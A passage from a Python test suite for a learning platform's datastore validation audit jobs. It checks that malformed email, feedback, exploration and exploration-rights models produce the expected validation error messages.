model_instance_with_invalid_id = email_models.BulkEmailModel(
id='invalid:id', recipient_ids=self.recipient_ids,
sender_id=self.sender_id, sender_email=self.sender_email,
intent=feconf.BULK_EMAIL_INTENT_MARKETING,
subject='Email Subject', html_body='Email Body',
sent_datetime=datetime.datetime.utcnow())
model_instance_with_invalid_id.put()
expected_output = [(
u'[u\'fully-validated BulkEmailModel\', 1]'
), (
u'[u\'failed validation check for model id check of '
'BulkEmailModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % model_instance_with_invalid_id.id]
run_job_and_check_output(self, expected_output, sort=True)
class GeneralFeedbackEmailReplyToIdModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(GeneralFeedbackEmailReplyToIdModelValidatorTests, self).setUp()
self.thread_id = feedback_services.create_thread(
'exploration', 'expid', None, 'a subject', 'some text')
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.model_instance = (
email_models.GeneralFeedbackEmailReplyToIdModel.create(
self.user_id, self.thread_id))
self.model_instance.put()
self.job_class = (
prod_validation_jobs_one_off
.GeneralFeedbackEmailReplyToIdModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [(
u'[u\'fully-validated GeneralFeedbackEmailReplyToIdModel\', 1]')]
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of GeneralFeedbackEmailReplyToIdModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id, self.model_instance.created_on,
self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
expected_output = [(
u'[u\'failed validation check for current time check of '
'GeneralFeedbackEmailReplyToIdModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_user_id(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [(
u'[u\'failed validation check for item.id.user_id field check of '
'GeneralFeedbackEmailReplyToIdModel\', '
'[u"Entity id %s: based on field item.id.user_id having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.user_id, self.user_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_thread_id(self):
feedback_models.GeneralFeedbackThreadModel.get_by_id(
self.thread_id).delete()
expected_output = [(
u'[u\'failed validation check for item.id.thread_id field check of '
'GeneralFeedbackEmailReplyToIdModel\', '
'[u"Entity id %s: based on field item.id.thread_id having value '
'%s, expect model GeneralFeedbackThreadModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.thread_id, self.thread_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_reply_to_id(self):
while len(
self.model_instance.reply_to_id) <= (
email_models.REPLY_TO_ID_LENGTH):
self.model_instance.reply_to_id = (
self.model_instance.reply_to_id + 'invalid')
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for reply_to_id length check of '
'GeneralFeedbackEmailReplyToIdModel\', '
'[u\'Entity id %s: reply_to_id %s should have length less than or '
'equal to %s but instead has length %s\']]'
) % (
self.model_instance.id, self.model_instance.reply_to_id,
email_models.REPLY_TO_ID_LENGTH,
len(self.model_instance.reply_to_id))]
run_job_and_check_output(self, expected_output)
class ExplorationModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExplorationModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
language_codes = ['ar', 'en', 'en']
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
language_code=language_codes[i]
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.model_instance_0 = exp_models.ExplorationModel.get_by_id('0')
self.model_instance_1 = exp_models.ExplorationModel.get_by_id('1')
self.model_instance_2 = exp_models.ExplorationModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.ExplorationModelAuditOneOffJob)
def test_standard_operation(self):
exp_services.update_exploration(
self.owner_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExplorationModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_schema(self):
expected_output = [
(
u'[u\'failed validation check for domain object check of '
'ExplorationModel\', '
'[u\'Entity id %s: Entity fails domain validation with the '
'error Invalid language_code: %s\']]'
) % (self.model_instance_0.id, self.model_instance_0.language_code),
u'[u\'fully-validated ExplorationModel\', 2]']
with self.swap(
constants, 'ALL_LANGUAGE_CODES', [{
'code': 'en', 'description': 'English'}]):
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_commit_log_entry_model_failure(self):
exp_services.update_exploration(
self.owner_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
exp_models.ExplorationCommitLogEntryModel.get_by_id(
'exploration-0-1').delete()
expected_output = [
(
u'[u\'failed validation check for '
'exploration_commit_log_entry_ids field check of '
'ExplorationModel\', '
'[u"Entity id 0: based on field '
'exploration_commit_log_entry_ids having value '
'exploration-0-1, expect model ExplorationCommitLogEntryModel '
'with id exploration-0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_summary_model_failure(self):
exp_models.ExpSummaryModel.get_by_id('0').delete()
expected_output = [
(
u'[u\'failed validation check for exp_summary_ids '
'field check of ExplorationModel\', '
'[u"Entity id 0: based on field exp_summary_ids having '
'value 0, expect model ExpSummaryModel with id 0 '
'but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_rights_model_failure(self):
exp_models.ExplorationRightsModel.get_by_id(
'0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_rights_ids '
'field check of ExplorationModel\', '
'[u"Entity id 0: based on field exploration_rights_ids '
'having value 0, expect model ExplorationRightsModel '
'with id 0 but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
exp_models.ExplorationSnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of ExplorationModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model ExplorationSnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
exp_models.ExplorationSnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of ExplorationModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model ExplorationSnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ExplorationSnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
if exp.id != '0':
exp_services.save_new_exploration(self.owner_id, exp)
else:
exp_services.save_new_exploration(self.user_id, exp)
self.model_instance_0 = (
exp_models.ExplorationSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
exp_models.ExplorationSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
exp_models.ExplorationSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
exp_services.update_exploration(
self.owner_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExplorationSnapshotMetadataModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'ExplorationSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExplorationSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field exploration_ids '
'having value 0, expect model ExplorationModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'exploration_ids having value 0, expect model '
'ExplorationModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'ExplorationSnapshotMetadataModel\', 2]')]
run_job_and_check_output(
self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of ExplorationSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'ExplorationSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_exploration_version_in_model_id(self):
model_with_invalid_version_in_id = (
exp_models.ExplorationSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for exploration model '
'version check of ExplorationSnapshotMetadataModel\', '
'[u\'Entity id 0-3: Exploration model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated ExplorationSnapshotMetadataModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_state'
}, {
'cmd': 'delete_state',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit '
'cmd delete_state check of '
'ExplorationSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'delete_state\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: '
'state_name, The following extra attributes are present: '
'invalid_attribute"]]'
), (
u'[u\'failed validation check for commit '
'cmd add_state check of '
'ExplorationSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'add_state\'} '
'failed with error: The following required attributes '
'are missing: state_name"]]'
), u'[u\'fully-validated ExplorationSnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExplorationSnapshotContentModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.model_instance_0 = (
exp_models.ExplorationSnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
exp_models.ExplorationSnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
exp_models.ExplorationSnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
exp_services.update_exploration(
self.owner_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExplorationSnapshotContentModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'ExplorationSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExplorationSnapshotContentModel\', '
'[u"Entity id 0-1: based on field exploration_ids '
'having value 0, expect model ExplorationModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'exploration_ids having value 0, expect model '
'ExplorationModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'ExplorationSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_exploration_version_in_model_id(self):
model_with_invalid_version_in_id = (
exp_models.ExplorationSnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for exploration model '
'version check of ExplorationSnapshotContentModel\', '
'[u\'Entity id 0-3: Exploration model corresponding to '
'id 0 has a version 1 which is less than '
'the version 3 in snapshot content model id\']]'
), (
u'[u\'fully-validated ExplorationSnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExplorationRightsModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
editor_email = 'user@editor.com'
viewer_email = 'user@viewer.com'
self.signup(editor_email, 'editor')
self.signup(viewer_email, 'viewer')
self.editor_id = self.get_user_id_from_email(editor_email)
self.viewer_id = self.get_user_id_from_email(viewer_email)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
rights_manager.assign_role_for_exploration(
self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
rights_manager.assign_role_for_exploration(
self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
self.model_instance_0 = exp_models.ExplorationRightsModel.get_by_id('0')
self.model_instance_1 = exp_models.ExplorationRightsModel.get_by_id('1')
self.model_instance_2 = exp_models.ExplorationRightsModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.ExplorationRightsModelAuditOneOffJob)
def test_standard_operation(self):
rights_manager.publish_exploration(self.owner, '0')
expected_output = [
u'[u\'fully-validated ExplorationRightsModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationRightsModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationRightsModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_first_published_datetime_than_current_time(self):
rights_manager.publish_exploration(self.owner, '0')
rights_manager.publish_exploration(self.owner, '1')
self.model_instance_0.first_published_msec = (
self.model_instance_0.first_published_msec * 1000000.0)
self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for first published msec check '
'of ExplorationRightsModel\', '
'[u\'Entity id 0: The first_published_msec field has a '
'value %s which is greater than the time when the job was '
'run\']]'
) % (self.model_instance_0.first_published_msec),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(
feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field exploration_ids having '
'value 0, expect model ExplorationModel with id 0 but '
'it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_cloned_from_exploration_model_failure(self):
self.model_instance_0.cloned_from = 'invalid'
self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for '
'cloned_from_exploration_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field cloned_from_exploration_ids '
'having value invalid, expect model ExplorationModel with id '
'invalid but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_owner_user_model_failure(self):
rights_manager.assign_role_for_exploration(
self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for owner_user_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field owner_user_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_editor_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
expected_output = [
(
u'[u\'failed validation check for editor_user_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field editor_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.editor_id, self.editor_id),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_viewer_user_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
expected_output = [
(
u'[u\'failed validation check for viewer_user_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 2: based on field viewer_user_ids having '
'value %s, expect model UserSettingsModel with id %s but '
'it doesn\'t exist"]]') % (
self.viewer_id, self.viewer_id),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model '
'ExplorationRightsSnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'
),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
exp_models.ExplorationRightsSnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of ExplorationRightsModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model ExplorationRightsSnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationRightsModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ExplorationRightsSnapshotMetadataModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
if exp.id != '0':
exp_services.save_new_exploration(self.owner_id, exp)
else:
exp_services.save_new_exploration(self.user_id, exp)
self.model_instance_0 = (
exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
exp_models.ExplorationRightsSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationRightsSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
expected_output = [
u'[u\'fully-validated ExplorationRightsSnapshotMetadataModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationRightsSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_rights_model_failure(self):
exp_models.ExplorationRightsModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_rights_ids '
'field check of ExplorationRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field exploration_rights_ids '
'having value 0, expect model ExplorationRightsModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'exploration_rights_ids having value 0, expect model '
'ExplorationRightsModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of ExplorationRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_exploration_version_in_model_id(self):
model_with_invalid_version_in_id = (
exp_models.ExplorationRightsSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for exploration rights model '
'version check of ExplorationRightsSnapshotMetadataModel\', '
'[u\'Entity id 0-3: ExplorationRights model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotMetadataModel\', 3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'change_exploration_status',
'old_status': rights_manager.ACTIVITY_STATUS_PUBLIC,
}, {
'cmd': 'release_ownership',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit cmd '
'change_exploration_status check of '
'ExplorationRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'old_status\': u\'public\', '
'u\'cmd\': u\'change_exploration_status\'} '
'failed with error: The following required '
'attributes are missing: new_status"]]'
), (
u'[u\'failed validation check for commit cmd '
'release_ownership check of '
'ExplorationRightsSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'release_ownership\', '
'u\'invalid_attribute\': u\'invalid\'} '
'failed with error: The following extra attributes '
'are present: invalid_attribute"]]'
), (
u'[u\'fully-validated '
'ExplorationRightsSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsSnapshotContentModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ExplorationRightsSnapshotContentModelValidatorTests, self).setUp(
)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.model_instance_0 = (
